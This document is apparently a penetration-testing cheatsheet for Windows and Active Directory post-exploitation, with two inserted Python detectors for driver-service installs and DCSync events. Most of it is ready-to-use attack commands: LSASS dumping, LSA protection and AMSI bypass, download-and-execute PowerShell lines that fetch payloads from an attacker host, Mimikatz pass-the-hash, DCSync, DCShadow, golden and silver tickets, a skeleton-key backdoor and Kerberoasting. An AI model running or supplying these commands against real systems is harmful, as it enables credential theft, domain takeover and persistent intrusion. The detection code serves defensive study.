PoC
Linux
cat proof.txt && whoami && hostname && ip addr
cat local.txt && whoami && hostname && ip addr
Windows
type proof.txt && whoami && hostname && ipconfig
type local.txt && whoami && hostname && ipconfig
Catch the Flag
Windows
dir "\proof*.txt" /s
PS> gci -recurse -Include FILENAME*
Search for credentials or passwords:
gci -path . -recurse -ea SilentlyContinue -Include *.txt,*.ini,*.yml,*.xml,*.ps1,*.cfg | select-string pass
Linux
find / -type f -iname "flag.txt" 2>/dev/null
Dump Active Directory with PS
[PS] Import-Module ActiveDirectory
[PS] Get-ADObject -LDAPFilter "(&(objectClass=user)(description=*pass*))" -property * | Select-Object SAMAccountName, Description, DistinguishedName
Dump with dump.exe
Make sure you are able to access LSASS, or that you have already bypassed LSA Protection to remove it.
https://github.com/chvancooten/OSEP-Code-Snippets/tree/main/MiniDump
Build it with the Release, x64 configuration, then run it on the compromised host with NT AUTHORITY\SYSTEM privileges.
The dump is written to C:\Windows\Tasks\lsass.dmp.
Then parse lsass.dmp on Kali Linux with:
pypykatz lsa minidump lsass.dmp
or on a Windows machine:
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Dump with Mimikatz
ref: https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz
cheatsheet: https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49
copied from: https://kashz.gitbook.io/kashz-jewels/cheatsheet/mimikatz
Bypass LSA Protection
https://blog.cyberadvisors.com/technical-blog/blog/credential-dumping-protections-part-2-bypass-lsa-protection
Make sure mimikatz.sys is in the same folder as mimikatz.exe.
Run this command:
# detect LSA Protection (this error means it is enabled)
# <snip> ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory <snip>
.\mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit"
Bypass AV and LSA
Make sure the current shell is NT AUTHORITY\SYSTEM.
Copy mimidrv.sys or mimikatz.sys (the driver) to the target computer,
then create a new service:
sc create mimidrv binPath= C:\windows\tasks\mimidrv.sys type= kernel start= demand
[SC] CreateService SUCCESS
Start the new service.
Then you are able to load Mimikatz into memory with Invoke-Mimikatz:
# disable AMSI
(new-object system.net.webclient).downloadstring('http://192.168.x.y/amsi.txt') |IEX
# invoke-mimikatz with powershell
(new-object system.net.webclient).downloadstring('http://192.168.x.y/Invoke-Mimikatz.ps1') |IEX
Disable LSA Protection
Invoke-Mimikatz -Command "`"!processprotect /process:lsass.exe /remove`""
If successful:
# mimikatz(powershell) # !processprotect /process:lsass.exe /remove
# Process : lsass.exe
PID 123 -> 00/00 [0-0-0]
Now you are able to interact with LSASS.
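From the defender's side, the step above leaves a clear trace: a kernel-mode driver service (here `mimidrv`, binary in C:\windows\tasks) is installed, which Windows logs as System event 7045. The following is an added example, not part of this cheatsheet, that scans constructed 7045 messages and flags kernel drivers installed from user-writable directories or with known credential-dumping driver names; the writable-directory list and driver names are assumptions to tune per environment.

```python
# Constructed sample System-log 7045 "A service was installed" messages, not real telemetry.
SAMPLE_7045 = [
    "Service Name: mimidrv\nService File Name: C:\\windows\\tasks\\mimidrv.sys\n"
    "Service Type: kernel mode driver\nService Start Type: demand start\nService Account: ",
    "Service Name: MyBackupSvc\nService File Name: \"C:\\Program Files\\Backup\\svc.exe\"\n"
    "Service Type: user mode service\nService Start Type: auto start\nService Account: LocalSystem",
    "Service Name: WdNisDrv\nService File Name: C:\\Windows\\System32\\drivers\\WdNisDrv.sys\n"
    "Service Type: kernel mode driver\nService Start Type: demand start\nService Account: ",
]

# Assumed list of directories ordinary users can write to; a kernel driver
# loaded from one of these is a strong signal.
WRITABLE_DIRS = ("c:\\windows\\tasks\\", "c:\\windows\\temp\\", "c:\\users\\", "c:\\programdata\\")
# Assumed list of driver/service names tied to credential dumping tooling.
KNOWN_DRIVER_NAMES = ("mimidrv", "mimikatz")
SYSTEM_DRIVER_DIR = "c:\\windows\\system32\\drivers\\"


def parse_7045(message):
    """Split the 'Key: Value' lines of a 7045 message into a dict."""
    fields = {}
    for line in message.splitlines():
        key, _, value = line.partition(":")
        fields[key.strip()] = value.strip().strip('"')
    return fields


def flag_service_install(message):
    """Return the list of reasons this service install looks suspicious (empty = benign)."""
    f = parse_7045(message)
    path = f.get("Service File Name", "").lower()
    name = f.get("Service Name", "").lower()
    reasons = []
    if f.get("Service Type", "").lower() == "kernel mode driver":
        if not path.startswith(SYSTEM_DRIVER_DIR):
            reasons.append("kernel driver outside System32\\drivers")
        if any(path.startswith(d) for d in WRITABLE_DIRS):
            reasons.append("driver loaded from user-writable directory")
    if any(k in name or k in path for k in KNOWN_DRIVER_NAMES):
        reasons.append("known credential-dumping driver name")
    return reasons


def scan(messages):
    """Map flagged service names to their reasons."""
    return {parse_7045(m)["Service Name"]: flag_service_install(m)
            for m in messages if flag_service_install(m)}
```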
[Important to start first] Test Mimikatz
privilege::debug
# Privilege '20' OK => Working properly
Password / hashes
# dump logged-on users' passwords or NTLM hashes
sekurlsa::logonpasswords
# dump hashes
lsadump::sam
lsadump::lsa [/inject | /patch]
# hashcat -m 1000 <hash>
Escalate privilege using NTLM Hash
ref: https://www.youtube.com/watch?v=NeY7OiQTRK8
# get the NTLM hash of Administrator from `sekurlsa::logonpasswords`
sekurlsa::pth /user:Administrator /domain:lab.local /ntlm:<ntlm hash> /run:cmd
DCsync (AD Privilege Escalation)
[requirement] the user must have these permissions on the domain:
Replication Directory Changes
Replication Directory Changes All
lsadump::dcsync /user:krbtgt
lsadump::dcsync /user:administrator
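The two replication rights listed above are the detection hook on the defender's side: a DCSync shows up as Security event 4662 with control access (Access Mask 0x100) on the domain object whose Properties contain the replication control-access GUIDs, from an account that is not a domain controller. The following is an added example, not from this cheatsheet, that checks constructed 4662 records; the set of legitimate replicators (DC computer accounts) is an assumption to fill in per domain.

```python
import re

# Well-known AD schema GUIDs of the control-access rights DCSync needs.
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Assumed set of accounts that legitimately replicate (DC machine accounts).
KNOWN_DCS = {"DC01$", "DC02$"}

# Constructed 4662 records (only the fields used here), not real telemetry.
SAMPLE_4662 = [
    {"SubjectUserName": "DC02$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "jdoe", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"SubjectUserName": "jdoe", "AccessMask": "0x20094",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def replication_rights(event):
    """Names of replication rights exercised in this event (empty if none)."""
    if event.get("AccessMask", "").lower() != "0x100":  # 0x100 = control access
        return []
    return [REPL_GUIDS[g.lower()]
            for g in GUID_RE.findall(event.get("Properties", ""))
            if g.lower() in REPL_GUIDS]


def is_suspicious_dcsync(event, known_dcs=KNOWN_DCS):
    """True when replication rights are used by something other than a known DC."""
    return bool(replication_rights(event)) and event.get("SubjectUserName", "") not in known_dcs


def find_dcsync(events, known_dcs=KNOWN_DCS):
    """Return (account, rights) for every suspicious replication request."""
    return [(e["SubjectUserName"], replication_rights(e))
            for e in events if is_suspicious_dcsync(e, known_dcs)]
```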
[recommended to start] Elevate shell integrity
# use when evil-winrm only gives a medium-integrity shell
token::elevate
DCshadow
# simple PoC
lsadump::dcshadow /object:CN=administrator,CN=users,DC=hackers,DC=local /attribute:description /value:"modified dcshadow"
Attack DCshadow and DCsync (persistence domain admin / AD Attribute Takeover)
https://www.elladodelmal.com/2018/03/dcshadow-y-dcsync-enganando-al-domain.html
Use case:
# set the attribute to update
token::elevate
lsadump::dcshadow /object:CN=administrator,CN=users,DC=hackers,DC=local /attribute:telephoneNumber /value:"123-123-223"
# from a second mimikatz shell, push the change
lsadump::dcshadow /push
Golden / Silver Ticket
# dump hash and SID
lsadump::lsa /inject /name: [krbtgt | DOMAIN_ADMIN_ACCOUNT | SERVICE_ACCOUNT]
# create golden ticket and pass-the-ticket
kerberos::golden /user:Administrator /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_NTLM_HASH /id:500 /ptt
# create silver ticket and pass-the-ticket
kerberos::golden /user:<USER> /domain:DOMAIN /sid:SID /krbtgt:SERVICE_NTLM_hash /id:1103 /ptt
# check
misc::cmd
dir \\IP\c$ [/user:USER PASS]
PsExec.exe \\IP cmd.exe
# Kerberoasting attack
# ref: https://www.netwrix.com/cracking_kerberos_tgs_tickets_using_kerberoasting.html
kerberos::list /export
# download ticket in C:\kerberoast and crack with tgsrepcrack.py
Kerberos Skeleton key
Installs a backdoor in memory so that every user can also authenticate with the password "mimikatz".
Note: the backdoor does not survive a reboot.
misc::skeleton
# done, now access the admin share
> net use C:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz
> dir \\Desktop-1\c$ /user:Machine1 mimikatz
Get DNS Zone
cd C:\Windows
PS> gci -recurse -Include <DOMAIN>*
Online request server:
https://beeceptor.com/